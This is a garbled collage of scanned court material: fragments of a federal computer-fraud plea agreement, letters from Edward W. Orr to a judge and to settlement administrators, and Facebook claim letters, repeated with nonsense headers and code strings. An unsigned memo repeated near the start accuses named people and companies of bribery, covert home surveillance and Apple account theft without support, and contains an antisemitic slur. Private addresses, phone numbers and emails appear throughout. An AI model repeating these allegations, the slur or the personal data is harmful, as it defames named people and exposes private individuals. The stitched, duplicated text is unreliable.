:311    A    (JC)
:392    A    (JC)
:703    A    (JC)
```

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

process. Served her right. HH and Alexander paid Macri's men $240,000,
plus extra for Orr's IPhone and other info. Jones was especially scared
after that, though, when Shanin Specter later wrote to Leila Vespoli at
FE. Shanin nearly put West Penn into bankruptcy with the Goretzka case,
and he could do it again with Orr – even ban fracking and other O-G
ventures in three states – just like NY already. "Stop him," said
Jones, and so we did, by stomping Orr. We paid $205,000 to the PUC
attorney who wrote to Specter about Orr, and it was worth every penny
of it. What a letter. The five on the end of the number was Macri's
idea. Vespoli got more than twice as much, but with no five on the end.
We gave her $460,000. Not bad for Lady Bigwig's retirement. Macri's
joint work with ADT has helped a lot, but it hurt, too, like when he
got involved with Telesforo Aviles to get Orr's place wired with extra
surveillance cameras, in and out, and all with remote control and
access. Macri and Aviles saw Orr's every move, sometimes even in bed.
Remember how we dovetailed this with Range Resources? Well, their share
from us amounted to over $370,000 twice over, with much of that to the
Range Manager who spoke with both Jew Orr and Darlene on the phone.
Halliburton's fellow in Canonsburg, and the Rice boys, plus the firms
that came out to dig in Orr's yard again after he reported them – each
got nearly as much combined – between six and seven hundred thousand a
piece – from our MSO. The Halliburton guy is the same one from
Deepwater or whatever the hell it was, and he was drunk when we gave it
to him. And with the cash in the Rice boys' dad's account, they laughed
– "where's the beef" – and insisted on an extra kicker. The second
million-d payment we made. The first that I remember went to the 801
Cherry Street/Fort Worth div of First Energy Services Company (just
like Akron's name, and it's pretty dam amazing that there's a third and
fourth firm out there somewhere else too with the same fn name). You
asked about GLE: Great Lakes Energy was the name of the JV between
Range Resources and West Penn/FE, and drilled the first frack well or
something like that, so all this stuff keeps recycling back to RR and
friends. The C'burg's Halliburton boy's daughter got married, I think,
and Macri offended the drunk daddy with some sort of comment about the
groom looking like "a man's man," and then Macri laughed his laugh, so
there was bad blood for a while. Macri's Montagu contact at the
Millmont Foundation in Alison Park asked for another $60,000 for the
info they had on Orr, and it was definitely worth it, although they
didn't have nearly as much to offer as Macri had hoped for. Some of
their info came from Munich and the Richard Montagu recruiter; had
footage from the Bayerischer Hof hotel, the restaurant, too. Other
items, not Montagu, came from Wesel, Vienna, Wallingford, and several
other, also the Midland H.I. and Collinson. At least before Macri bit
the dust, he got the Apple ID and password sets, even played havoc with
mix and match here and there, which Apple got confused about more than
once. After getting the Apple sets, M transferred a whole bunch, got
all texts and links, Orrs and others, but with Orr went further and got
cross-KR96-type stuff plus a couple of extra goodies for fun like the
Second SC String Band. You were right about the band, Dave. Not bad, if
you watch where you play it. That's about all for now. Call me. HG.
Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital

3791436

2073984700

DC  FL Document 10 (XC-3)

A.ゆ.ti 1981 / 07395+
Medical Records Release Authorization
:395      A      (NN)
:199      A      (JC)
:199      A      (JC)
:28:      A      (JC)
:70)      A      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

process. Served her right. HH and Alexander paid Macri's men $240,000, plus extra for Orr's IPhone and other info. Jones was especially scared after that, though, when Shanin Specter later wrote to Leila Vespoli at FE. Shanin nearly put West Penn into bankruptcy with the Goretzka case, and he could do it again with Orr - even ban fracking and other O-G ventures in three states — just like NY already. "Stop him," said Jones, and so we did, by stomping Orr. We paid $205,000 to the PUC attorney who wrote to Specter about Orr, and it was worth every penny of it. What a letter. The five on the end of the number was Macri's idea. Vespoli got more than twice as much, but with no five on the end. We gave her $460,000. Not bad for Lady Bigwig's retirement. Macri's joint work with ADT has helped a lot, but it hurt, too, like when he got involved with Telesforo Aviles to get Orr's place wired with extra surveillance cameras, in and out, and all with remote control and access. Macri and Aviles saw Orr's every move, sometimes even in bed. Remember how we dovetailed this with Range Resources? Well, their share from us amounted to over $370,000 twice over, with much of that to the Range Manager who spoke with both Jew Orr and Darlene on the phone. Halliburton's fellow in Canonsburg, and the Rice boys, plus the firms that came out to dig in Orr's yard again after he reported them - each got nearly as much combined - between six and seven hundred thousand a piece - from our MSO. The Halliburton guy is the same one from Deepwater or whatever the hell it was, and he was drunk when we gave it to him. And with the cash in the Rice boys' dad's account, they laughed - "where's the beef" - and insisted on an extra kicker. The second million-d payment we made. The first that I remember went to the 801 Cherry Street/Fort Worth div of First Energy Services Company (just like Akron's name, and it's pretty dam amazing that there's a third and fourth firm out there somewhere else too with the same fn name). You asked about GLE: Great Lakes Energy was the name of the JV between Range Resources and West Penn/FE, and drilled the first frack well or something like that, so all this stuff keeps recycling back to RR and friends. The C'burg's Halliburton boy's daughter got married, I think, and Macri offended the drunk daddy with some sort of comment about the groom looking like "a man's man," and then Macri laughed his laugh, so there was bad blood for a while. Macri's Montagu contact at the Millmont Foundation in Alison Park asked for another $60,000 for the info they had on Orr, and it was definitely worth it, although they didn't have nearly as much to offer as Macri had hoped for. Some of their info came from Munich and the Richard Montagu recruiter; had footage from the Bayerischer Hof hotel, the restaurant, too. Other items, not Montagu, came from Wesel, Vienna, Wallingford, and several other, also the Midland H.I. and Collinson. At least before Macri bit the dust, he got the Apple ID and password sets, even played havoc with mix and match here and there, which Apple got confused about more than once. After getting the Apple sets, M transferred a whole bunch, got all texts and links, Orrs and others, but with Orr went further and got cross-KR96-type stuff plus a couple of extra goodies for fun like the Second SC String Band. You were right about the band, Dave. Not bad, if you watch where you play it. That's about all for now. Call me. HG.
. Mem/dwnload473Kb/s:Phone server co-source Digital Messaging System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone      server      co-source      Digital

2073984700

DC   FL Document 10 (AC-2)

```
August 1993 / 07056.
Medical Records Release Authorization
:993     A    (NM)
:993     A    (JC)
:993     A    (JC)
:20:     A    (JC)
2:0:     A    (JC)
```

## CHRON  (REVIEW  4  OF  4)
Password required to print: ···········

pleading guilty, and agrees that the factual resume the defendant has signed is true and

will be submitted as evidence.

　　3.　　Sentence: The maximum penalties the Court can impose include:

　　　　a.　　imprisonment for a period not to exceed five years;

　　　　b.　　a fine not to exceed $250,000.00, or twice any pecuniary gain to the
defendant or loss to the victim(s);

　　　　c.　　a term of supervised release of not more than three years, which may
be mandatory under the law and will follow any term of
imprisonment. If the defendant violates the conditions of supervised
release, the defendant could be imprisoned for the entire term of
supervised release;

　　　　d.　　a mandatory special assessment of $100.00;

　　　　e.　　restitution to victims or to the community, which may be mandatory
under the law, and which the defendant agrees may include
restitution arising from all relevant conduct, not limited to that
arising from the offense of conviction alone;

　　　　f.　　costs of incarceration and supervision; and

　　　　g.　　forfeiture of property.

　　4.　　Immigration consequences: The defendant recognizes that pleading

guilty may have consequences with respect to the defendant's immigration status if the

defendant is not a citizen of the United States. Under federal law, a broad range of

crimes are removable offenses. The defendant understands this may include the offense

to which the defendant is pleading guilty, and for purposes of this plea agreement, the

defendant assumes the offense is a removable offense. Removal and other immigration

Plea Agreement—Page 1

2073984700

DC PL Document ID (AC-2)

+48T50 / 1281 lingle
Medical Records Release Authorization

## CHRON (REVIEW 4 OF 4)

Password required to print: ···········

The Honorable John R. Adams
Page 6 of 9

FirstEnergy affiliate Telesforo Aviles', hacking and other illegitimate activities (see also Aviles, colleagues Baratov, et al).

FBI Agent Ryan Weydeck et al contacted Orr and his family regarding Aviles and colleagues. The Orr family was also asked to submit Victim Impact Statements (VIS).

Exhibits "S," "T," and "U" in the aforementioned submissions to the Southern District contain, for instance, certain correspondence that had been conducted with FBI Agent Weydeck and/or others.

Exhibit "O" therein contained Department of Justice (DOJ) correspondence, etc.

Multiple court records (outside of Southern District) reflect various of the FBI- and DOJ-related files; and the undersigned's submissions to the Southern District use a matter of the public record[1] elsewhere – so there was no logical reason why the Southern District should have failed to enter the undersigned's Objection into the record.

So, once again, why is there a gap in the Court Record in the Southern District of Ohio?

On or about July 19, 2022, the Court in the Southern District merely made a text entry about its "receipt" of the Objection via both modalities; nevertheless, it did not enter the actual Objection itself onto the record.

This is highly unusual, even given the fact that, later on, the Objection was officially "stricken.".

Another Objector's Objection (that of John Donovan) was also stricken, yet virtually every page of his Objection still made it onto the record.

Why, therefore, was Objector Orr's Objection treated differently?

---

[1] In addition, given the fact that FirstEnergy's activities were surreptitiously funneled through security leaks in Apple, Google, Yahoo, and Facebook servers [to mention only a few of the affected servers], the aforementioned FirstEnergy-related hackers were simultaneously involved in security breaches that have since been the subject of multiple class actions.

2073984700

DC FL Document ID (AC-1)

Clause 1331 / 07896s
Medical Records Release Authorization
1993    A    (NN)
1997    A    (JC)
1116    X    (JC)
1201    A    (JC)
2003    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

s. Wolfe

Case 0:20-cv-60971-AHS  Document 53-3  Entered on FLSD Docket 10/27/2020  Page 2 of 8
Case 3:20-cr-00506-X  Document 4  Filed 10/19/20  Page 1 of 7  PageID 6

# ORIGINAL

CLERK U.S. DISTRICT COURT
NORTHERN DIST. OF TX
FILED

2020 OCT 19  AM 11: 35

IN THE UNITED STATES DISTRICT COURT
FOR THE NORTHERN DISTRICT OF TEXAS
DALLAS DIVISION

DEPUTY CLERK_____

| | |
|---|---|
| UNITED STATES OF AMERICA | |
| v. | NO. |
| TELESFORO AVILES | **3-20CR0506-X** |

## PLEA AGREEMENT

Telesforo Aviles, the defendant, Tom Pappas, the defendant's attorney, and the

United States of America (the government) agree as follows:

1.    **Rights of the defendant:** The defendant understands that the defendant

has the rights:

    a.    to plead not guilty;

    b.    to have a trial by jury;

    c.    to have the defendant's guilt proven beyond a reasonable doubt;

    d.    to confront and cross-examine witnesses and to call witnesses in the
          defendant's defense; and

    e.    against compelled self-incrimination.

2.    **Waiver of rights and plea of guilty:** The defendant waives these rights

and pleads guilty to the offense alleged in Count One of the Information, charging a

violation of 18 U.S.C. § 1030(a)(2)(C) and (c)(2)(B)(ii), that is, Computer Fraud. The

defendant understands the nature and elements of the crime to which the defendant is

Plea Agreement—Page 1

2073984700

DC PL Document 10 (AC-7)

August 1991 / 07935:
Medical Records Release Authorization

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

### Why is it missing?

At this juncture, it is also vitally important to mention the following:

On July 22, 2022, the undersigned was appalled to learn of the error in the Class Notice, and of the Southern District's entry at Document Number 183 (this also occurred on the afternoon of July 22, 2022, the very same day on which the undersigned's Objection was officially "stricken," even though it had never even made it on to the record anyway.)

On the evening of July 22, 2022, the undersigned immediately contacted two leading attorneys,[16] in two separate firms, to share with them what had happened.

They, too, were appalled that defective Notice had been mailed, and recommended[17] that the undersigned explain to the Southern District what had happened.

[16] Both attorneys also pointed out, in terms of "the big picture," so to speak, the following in regard to the issue of Notice in a derivative suit: First of all, the instant case is not the only case impacted by what happens here. Second, the belatedly discovered issue of defective Notice in the context of a constellation of interrelated civil and criminal cases and/or investigations involving FirstEnergy is an issue that has potential impact not only on a number of civil and criminal investigations and cases – but also on a number of agency-related actions. Third, it is quite probable that eventually there will arise (if they do not already exist) multiple forums suitable for submission of FirstEnergy-related materials such as those serving as the basis of On'r a Objection. Fourth, the issue of defective Notice in a case (such as the instant one) involving numerous other civil and criminal incidents associated with improper dissemination of improper information, would seem to impact such things as the fairness of the proposed settlement, regardless of whether any shareholder objected or not – an instance which deserves mention for numerous reasons, one of which is the fact that the Court is entrusted with certain elements of a fiduciary role in overseeing and/or directing the process of "approval," etc.

[17] They noted also that, given the plethora of civil and criminal actions (and the large number of interrelated courts, judges, and issues) involving FirstEnergy, there have been multiple mentions on the record about various defective documents generated by, and/or disseminated by, via, and/or on behalf of FirstEnergy employees or agents, many of whom seem to have been saddled with questionable morals and/or motives.

2073984700

OC   FL Document 1D (AC-2)

Legal 1911 / 07894-
Medical Records Release Authorization
:195     A      INRI
:197     A      (JCI
:135     A      IJCI
::0:     A      IJCI
:501     A      (JCI

### CHRON (REVIEW 4 OF 4)
Password required to print: ...........

Northern District of Texas and does not bind any other federal, state, or local prosecuting authorities, nor does it prohibit any civil or administrative proceeding against the defendant or any property.

10.     **Violation of agreement:** The defendant understands that if the defendant violates any provision of this agreement, or if the defendant's guilty plea is vacated or withdrawn, the government will be free from any obligations of the agreement and free to prosecute the defendant for all offenses of which it has knowledge. In such event, the defendant waives any objections based upon delay in prosecution. If the plea is vacated or withdrawn for any reason other than a finding that it was involuntary, the defendant also waives objection to the use against the defendant of any information or statements the defendant has provided to the government, and any resulting leads.

11.     **Voluntary plea:** This plea of guilty is freely and voluntarily made and is not the result of force or threats, or of promises apart from those set forth in this plea agreement. There have been no guarantees or promises from anyone as to what sentence the Court will impose.

12.     **Waiver of right to appeal or otherwise challenge sentence:** The defendant waives the defendant's rights, conferred by 28 U.S.C. § 1291 and 18 U.S.C. § 3742, to appeal the conviction, sentence, fine and order of restitution or forfeiture in an amount to be determined by the district court. The defendant further waives the defendant's right to contest the conviction, sentence, fine and order of restitution or forfeiture in any collateral proceeding, including proceedings under 28 U.S.C. § 2241 and 28 U.S.C. § 2255. The defendant further waives the defendant's right to seek any future

Plea Agreement—Page 5

Case 5:12-md-02314-EJD Document 254-1 Filed 08/19/22 Page 38 of 73

2073984700

OC FL Document 10 (AC-1)

-9956-
August 1985 / 07994-
Redial Records Release Authorization
(1): A (NN)
(1): A (JC)
(1): X (SU)
(2): A (JC)
(2): A (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

Accordingly, the undersigned then sent a letter to the Southern District explaining what had happened. The contents of that particular letter were indeed entered onto the record by the Southern District (at Document Number 192); NEVERTHELESS, THE SOUTHERN DISTRICT STILL DID NOT ENTER ONTO THE RECORD THE AFOREMENTIONED 88-PAGE OBJECTION AND THE 24 EXHIBITS.

Would it be a logical conclusion that the Court Record in the Southern District of Ohio is complete?

No, it would not be a logical conclusion.

Said "record" is incomplete for an absolute plethora of reasons, more than half a dozen of which have been shown above in a numbered list.

The Court Record in the Southern District of Ohio is also incomplete because it is missing my 88-page Objection and its twenty-four exhibits; and I felt that it was my duty to inform the Northern District of what has happened.

In the transcript of Your Honor's questioning of Mr. Kwawegen, on or about March 9, 2022, the Court overtly mentioned the important role of the public; and you also mentioned the fact that you hoped people would come forward.

I have done my best to come forward, and hereby attached are the aforementioned 88-page Objection and its twenty-four exhibits. They should have been entered into the Court Record in the Southern District, and – for the reasons described above – I am hereby submitting them to you, for your review, and – at your discretion – for possible entry into the record in the Northern District.

Respectfully submitted,

Edward W. Orr
122 Ridge Road
Terryville, CT 06786
Email: eanddorr2@gmail.com
Telephone: (203) 658-4977

Enc.: As described and/or referenced herein

2073984700

OC   PL Document ID (XC-2)

August 1981 / 078696
Medical Records Release Authorization
1995      X      (888)
1995      X      (JC)
1116      X      (JC)
2201      X      (JC)
2201      X      (JC)

CHRON (REVIEW 4 OF 4)
Password required to print ..............

The Honorable John R. Adams
Page 9 of 9

cc:      S. Winick (per regular mail/pm)

S. Solender (per regular mail/pm)

S. Specter (per regular mail/pm)

2073984700

OC   FL Document ID (AC-3)

August 1995 / 07896x
Medical Records Release Authorization
:195   X     (NR)
:195   X     (JC)
:595   X     (JC)
:591   X     (JC)
3501   X     (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

Northern District of Texas and does not bind any other federal, state, or local prosecuting authorities, nor does it prohibit any civil or administrative proceeding against the defendant or any property.

10.   **Violation of agreement:**  The defendant understands that if the defendant violates any provision of this agreement, or if the defendant's guilty plea is vacated or withdrawn, the government will be free from any obligations of the agreement and free to prosecute the defendant for all offenses of which it has knowledge.  In such event, the defendant waives any objections based upon delay in prosecution.  If the plea is vacated or withdrawn for any reason other than a finding that it was involuntary, the defendant also waives objection to the use against the defendant of any information or statements the defendant has provided to the government, and any resulting leads.

11.   **Voluntary plea:**  This plea of guilty is freely and voluntarily made and is not the result of force or threats, or of promises apart from those set forth in this plea agreement.  There have been no guarantees or promises from anyone as to what sentence the Court will impose.

12.   **Waiver of right to appeal or otherwise challenge sentence:**  The defendant waives the defendant's rights, conferred by 28 U.S.C. § 1291 and 18 U.S.C. § 3742, to appeal the conviction, sentence, fine and order of restitution or forfeiture in an amount to be determined by the district court.  The defendant further waives the defendant's right to contest the conviction, sentence, fine and order of restitution or forfeiture in any collateral proceeding, including proceedings under 28 U.S.C. § 2241 and 28 U.S.C. § 2255.  The defendant further waives the defendant's right to seek any future

Plea Agreement—Page 5

2073984700

DC  PL Document ID (AC-3)

August 1981 / 07056-
Medical Records Release Authorization

| 195 | X | [NOX] |
| 193 | X | [JC] |
| 639 | X | [JC] |
| 201 | X | [JC] |
| 201 | X | [JC] |

## CHRON (REVIEW 4 OF 4)
#### Password required to print:............

Focus Center

# Focus Center

Focus Center

2073984700

CHRON (REVIEW 4 OF 4)

The Honorable John R. Adams
Page 9 of 9

cc:    S. Winick (per regular mail/pm)

S. Solender (per regular mail/pm)

S. Specter (per regular mail/pm)

2073984700

CHRON (REVIEW 4 OF 4)

2073984700

CHRON (REVIEW 4 OF 4)

5FCY8237GGOTO372S6AVILE5MACRILN8b
5FCY8237GGOTO372S6AVILE5MACRILN8b
5FCY8237GGOTO372S6AVILE5MACRILN8b
FIRSTENERGYFLGOTO7252S95ET59ARA39
5FCY8237GGOTO372S6AVILE5MACRILN8b

The Honorable John R. Adams
Page 8 of 9

Accordingly, the undersigned then sent a letter to the Southern District explaining what had happened. The contents of that particular letter were indeed entered onto the record by the Southern District (at Document Number 192). NEVERTHELESS, THE SOUTHERN DISTRICT STILL DID **NOT** ENTER ONTO THE RECORD THE AFOREMENTIONED 88-PAGE OBJECTION AND THE 24 EXHIBITS.

Would it be a logical conclusion that the Court Record in the Southern District of Ohio is complete?

No, it would not be a logical conclusion.

Said "record" is incomplete for an absolute plethora of reasons, more than half a dozen of which have been shown above in a numbered list.

The Court Record in the Southern District of Ohio is also incomplete because it is missing my 88-page Objection and its twenty-four exhibits; and I felt that it was my duty to inform the Northern District of what has happened.

In the transcript of Your Honor's questioning of Mr. Kpwawegen, on or about March 9, 2022, the Court overtly mentioned the important role of the public; and you also mentioned the fact that you hoped people would come forward.

I have done my best to come forward, and hereby attached are the aforementioned 88-page Objection and its twenty-four exhibits. They should have been entered into the Court Record in the Southern District, and — for the reasons described above — I am hereby submitting them to you, for your review, and — at your discretion — for possible entry into the record in the Northern District.

Respectfully submitted,

Edward W. Orr
122 Ridge Road
Terryville, CT 06786
Email: eanddorr2@gmail.com
Telephone: (203) 658-4977

Enc.: As described and/or referenced herein

2073984700

DC  FL Document ID (AC-1)

August 1981 / 07396.
Medical Records Release Authorization
1193     A     (BN)
1193     A     (JC)
1193     A     (JC)
3201     4     (JC)
3203     A     (JC)

CHRON  (REVIEW  4  OF  4)
Password required to print. ...........

Focus Center

Focus Center

Focus Center

0 7 8 9 6 6

2073984700

OC FL Document ID (AC-3)

Medical Records Release Authorization

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

SFCYB237GOTO372S6AVILE5MACRILN8b
SFCYB237GOTO372S6AVILE5MACRILN8b
SFCYB237GOTO372S6AVILE5MACRILN8b
FIRSTENERGYFLGOTO72S29S5ET9AR439
SFCYB237GOTO372S6AVILE5MACRILN8b

0 7 8 6 9 6

2073984700

DC PL Document ID (AC-2)

August 1995 / 07896.
Medical Records Release Authorization
1995    X    (NR)
1195    X    (JC)
1195    X    (JC)
2202    X    (JC)
2703    X    (JC)

CHRON (REVIEW 4 OF 4)
Password required to print.

Mr. Scott Fenwick
Heffler Claims Group
February 28, 2020
Page 43 of 44

Sincerely,

Edward W. Orr     Darlene D. Orr

122 Ridge Road
Terryville, CT 06786
Telephone: 203-565-5670
Email: eanddorr2@gmail.com

CRS/DDO:fw927435849r

Enc.: As described herein

State of Connecticut[7]

County of Hartford ss. (Town/City) Southington
On this the 29th day of Feb, 2020, before me, Rosemary De Feo, the under-signed officer, personally appeared Edward W. Orr and Darlene D. Orr

known to me (or satisfactorily proven) to be the persons whose names are subscribed to the within instrument and acknowledged that they executed the same for the purposes therein contained.

In witness whereof I hereunto set my hand.

ROSEMARY S DE FEO
Notary Public
Connecticut
My Commission Expires Apr 30, 2024

Signature of Notary Public
Date Commission Expires: April 30, 2024

cc:     Social Security Administration (prm)
        Harvard Medical School/EW (prm)

[7] Note: Owing to notarial regulations and/or signing space requirements (there is not enough space on the signature and/or notary page(s)/section(s) for the entire carbon copy (cc) list to simultaneously appear), part or all of the carbon copy list necessarily follows the signature and/or notary page(s)/section(s) in this document.

Page 43 of 44

2073984700

DC 71 Document 10 (AC-1)

CHRON (REVIEW 4 OF 4)

Facebook Internet Tracking Litigation
c/o Settlement Administrator
August 4, 2022
Page 1 of 4

EDWARD W. ORR
122 Ridge Road
Terryville, CT 06786

August 4, 2022

Facebook Internet Tracking Litigation
c/o Settlement Administrator
1650 Arch Street, Suite 2210
Philadelphia, PA 19103

RE: Completed Claim Form

Dear Sir or Madam:

In conjunction with FBI / DOJ (Federal Bureau of Investigation / Department of Justice) Cross-Reference Number 3-20CR0506-X et al, please note that my completed claim form is attached.

My Facebook accounts and the therewith-associated email addresses were backed by criminals who were later sent to prison. I was a victim numerous times.

As a result, please note the following idiosyncrasies in regard to my Facebook accounts and the therewith-associated URL information and email addresses, etc.:

1. In regard to such details as username or URL information for my Facebook account(s) – and as shown in FBI and DOJ file materials that are being concomitantly filed (on or about August 4, 2022, with such materials including many exhibits; additional materials may also be filed later in August as additional DOJ/FBI-related information may be forthcoming) by the undersigned with the Court in the associated class action case – please note that in excess of 147,382 username or URL combinations and/or permutations exist.

2073984700

OC   PL Document 10 (AC-2)

August 1995 / 07696.
Medical Records Release Authorization
1995     X        (NH)
1995     X        (JC)
1595     X        (JC)
1201     X        (JC)
1701     X        (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

Mr. Scott Fenwick
Heffler Claims Group
February 28, 2020
Page 43 of 44

Sincerely,

*Edward W. Orr  Darlene D. Orr*

Edward W. Orr       Darlene D. Orr

Focus Center

122 Ridge Road
Terryville, CT 06786
Telephone: 203-565-5670
Email: eanddorr2@gmail.com

## Focus Center

CRS/DDO:fw927435849r

Enc.: As described herein

Focus Center

State of Connecticut[7]

County of Hartford ss. (Town/City) Southington

On this the 29th day of Feb, 2020, before me, Rosemary DeFeo the under-signed officer, personally appeared Edward W. Orr and Darlene D. Orr

known to me (or satisfactorily proven) to be the persons whose names are subscribed to the within instrument and acknowledged that they executed the same for the purposes therein contained.

In witness whereof I hereunto set my hand.

ROSEMARY S DE FEO
Notary Public
Connecticut
My Commission Expires Apr 30, 2024

Signature of Notary Public

Date Commission Expires: April 30, 2024

cc:     Social Security Administration (prm)
        Harvard Medical School/EW (prm)

[7] Note: Owing to notarial regulations and/or signing space requirements (there is not enough space on the signature and/or notary page(s)/section(s) for the entire carbon copy (cc) list to simultaneously appear), part or all of the carbon copy list necessarily follows the signature and/or notary page(s)/section(s) in this document.

Page 43 of 44

2073984700

DC  7L Document 10 (RC-3)

August 1931 / 07895·
Medical Records Release Authorization
1935   X   (NN)
1991   X   (JC)
1931   X   (JC)
3201   X   (JC)
3701   X   (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ···········

Case 5:16-md-02752-LHK  Document 438-3  Filed 03/13/20  Page 44 of 1032

Mr. Scott Fenwick
Heffler Claims Group
February 28, 2020
Page 43 of 44

1
2
3  Sincerely,
4  *Edward W. Orr*  *Darlene D. Orr*
5  Edward W. Orr    Darlene D. Orr
6
7  122 Ridge Road
   Terryville, CT 06786
8  Telephone: 203-565-5670
9  Email: eanddorr2@gmail.com
10
11 CRS/DDO:fw927435849r
12 Enc.: As described herein
13 State of Connecticut[7]
14 County of Hartford ss. (Town/City) Southington
15 On this the 29th day of Feb, 2020, before me, Rosemary De Fea the under-
   signed officer, personally appeared Edward W. Orr and
16 Darlene D. Orr
17 known to me (or satisfactorily proven) to be the persons whose names are subscribed
18 to the within instrument and acknowledged that they executed the same for the
19 purposes therein contained.
20
   In witness whereof I hereunto set my hand. [signature]
21
22 ROSEMARY S DE FEO
   Notary Public                Signature of Notary Public
   Connecticut
   My Commission Expires Apr 30, 2024    Date Commission Expires: April 30, 2024
23
24 cc:  Social Security Administration (prm)
25      Harvard Medical School/EW (prm)
26
27 [7] Note: Owing to notarial regulations and/or signing space requirements (there is not enough
   space on the signature and/or notary page(s)/section(s) for the entire carbon copy (cc) list to
   simultaneously appear), part or all of the carbon copy list necessarily follows the signature
28 and/or notary page(s)/section(s) in this document.

   Page 43 of 44

2073984700

DC  PL Document 10 (AC-2)

August 1991 / 07996.
Medical Records Release Authorization
1995    X    (NR)
1993    X    (JC)
1995    X    (JC)
2701    X    (JC)
7501    X    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: **********

candom@cox.net et al and c.om@cox.net et al and
canddom2@gmail.com et al and canddom@comcast.net et al
and...". [See also, in FBI \ DOJ (Federal Bureau of
Investigation \ Department of Justice) files and/or cross-
references and links thereto: e.om@yahoo.com,
com2@yahoo.com, canddom2@yahoo.com,
canddom37@yahoo.com and/or additional permutations
thereof.]

Please note that the aforementioned URL combinations
and/or permutations number in excess of 147,382, and were
as a result of the hacking; the email-associated addresses
and/or codes also number in excess of 147,382.

See also the therewith-related and previously mentioned
FBI' Correspondence (in general et al to Exhibits "S," "T," "U," et al)
to the Orr family regarding Facebook \ FirstEnergy and ADT
damages; etc.

* * * * * * * *

See also FBI Agent Ryan Weydeck's cross-reference email
(court Exhibit "U") to the Orr Family regarding the
sentencing of FirstEnergy (SEE ALSO FACEBOOK \
FIRSTENERGY LINKS AND FBI CASE FILES HEREIN)
affiliate Telestron Aviles et al \ see also Baratov, and others;
see hacking, plus theft of mail; tampering with mail; copious
personal and property damages; etc. SEE ALSO
FACEBOOK-TRACKING ACTIVITIES AND
INTERACTION WITH FIRSTENERGY-AFFILIATED
INDIVIDUALS SUCH AS THOMAS MACRI, HAO GU,
ET AL, OVER A MULTI-YEAR TIME PERIOD.

---

' See also Facebook \ FirstEnergy links, including links to C. Jones, et al, who have also been the subject of multiple
criminal investigations and/or related.

 2073984700

DC FL Document ID (DC-3)

August 1981 / 07001+
Medical Records Release Authorization
1993      X      1901
1997      X      IJCI
1935      X      IJCI
2201      X      IJCI
2703      X      IJCI

CHRON (REVIEW 4 OF 4)
Password required to print: ···········

eandorr@cox.net et al and e.orr@cox.net et al and
eanddorr2@gmail.com et al and eanddorr@comcast.net et al
and..." [See also, in FBI / DOJ (Federal Bureau of
Investigation / Department of Justice) files and/or cross-
references and links thereto: e.orr@yahoo.com,
eorr2@yahoo.com, eanddorr2@yahoo.com,
eanddorr57@yahoo.com and/or additional permutations
thereof.]

Please note that the aforementioned URL combinations
and/or permutations number in excess of 147,382, and were
as a result of the hacking; the email-associated addresses
and/or codes also number in excess of 147,382.

See also the therewith-related and previously mentioned
FBI[1] Correspondence (in court Exhibits "S," "T," "U," et al)
to the Orr family regarding Facebook / FirstEnergy and ADT
damages; etc.

* * * * * * * *

See also FBI Agent Ryan Weydeck's cross-reference email
(court Exhibit "U) to the Orr Family regarding the
sentencing of FirstEnergy (SEE ALSO FACEBOOK /
FIRSTENERGY LINKS AND FBI CASE FILES HEREIN)
affiliate Telesforo Aviles et al / see also Baratov, and others;
see hacking, plus theft of mail; tampering with mail; copious
personal and property damages; etc. SEE ALSO
FACEBOOK-TRACKING ACTIVITIES AND
INTERACTION WITH FIRSTENERGY-AFFILIATED
INDIVIDUALS SUCH AS THOMAS MACRI, HAO GU,
ET AL, OVER A MULTI-YEAR TIME PERIOD.

---

[1] See also Facebook / FirstEnergy links, including links to C. Jones, et al, who have also been the subject of multiple
criminal investigations and/or related.

2073984700

DC FL Document ID [MC-3]

```
4-0v41 1981 / 07896.
Medical Records Release Authorization
1993    A    LNM1
1997    A    LJC1
1999    A    LJC1
2201    A    LJC1
2201    A    LJC1
```

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

eandorr@cox.net et al and e.orr@cox.net et al and
eanddorr2@gmail.com et al and eanddorr@comcast.net et al
and..." [See also, in FBI / DOJ (Federal Bureau of
Investigation / Department of Justice) files and/or cross-
references and links thereto:    e.orr@yahoo.com,
eorr2@yahoo.com,                 eanddorr2@yahoo.com,
eanddorr57@yahoo.com and/or additional permutations
thereof.]

· Please note that the aforementioned URL combinations
and/or permutations number in excess of 147,382, and were
as a result of the hacking; the email-associated addresses
and/or codes also number in excess of 147,382.

See also the therewith-related and previously mentioned
FBI[1] Correspondence (in court Exhibits "S," "T," "U," et al)
to the Orr family regarding Facebook/ FirstEnergy and ADT
damages; etc.

See also FBI Agent Ryan Weydeck's cross-reference email
(court Exhibit "U) to the Orr Family regarding the
sentencing of FirstEnergy (SEE ALSO FACEBOOK /
FIRSTENERGY LINKS AND FBI CASE FILES HEREIN)
affiliate Telesforo Aviles et al / see also Baratov, and others;
see hacking, plus theft of mail; tampering with mail; copious
personal and property damages; etc. SEE ALSO
FACEBOOK-TRACKING      ACTIVITIES      AND
INTERACTION WITH FIRSTENERGY-AFFILIATED
INDIVIDUALS SUCH AS THOMAS MACRI, HAO GU,
ET AL, OVER A MULTI-YEAR TIME PERIOD.

---

[1] See also Facebook / FirstEnergy links, including links to C. Jones, et al, who have also been the subject of multiple
criminal investigations and/or related.

2073984700

DC FL Document ID (AC-1)

```
August 1981 / 07896-
Medical Records Release Authorization
1195    X    (KK)
1995    X    (JC)
1910    X    (JC)
3201    X    (JC)
1591    X    (JC)
```

### CHRON (REVIEW 4 OF 4)
Password required to print. ............

(Please note, though, that the undersigned did not originally have hundreds of thousands of email addresses and/or username or URL information sets per se; yet the hacking activities altered and/or otherwise resulted in hundreds of thousands of combinations either in practice and/or as links, ghosts, etc.)

2. Additional details are shown below and in the court files and cross-references thereto.

3. In regard to such details as email addresses associated with my Facebook account(s) – and as shown in FBI and DOJ materials filed with the Court in the associated class action case – please note that in excess of 147,382 email address combinations and/or permutations exist.

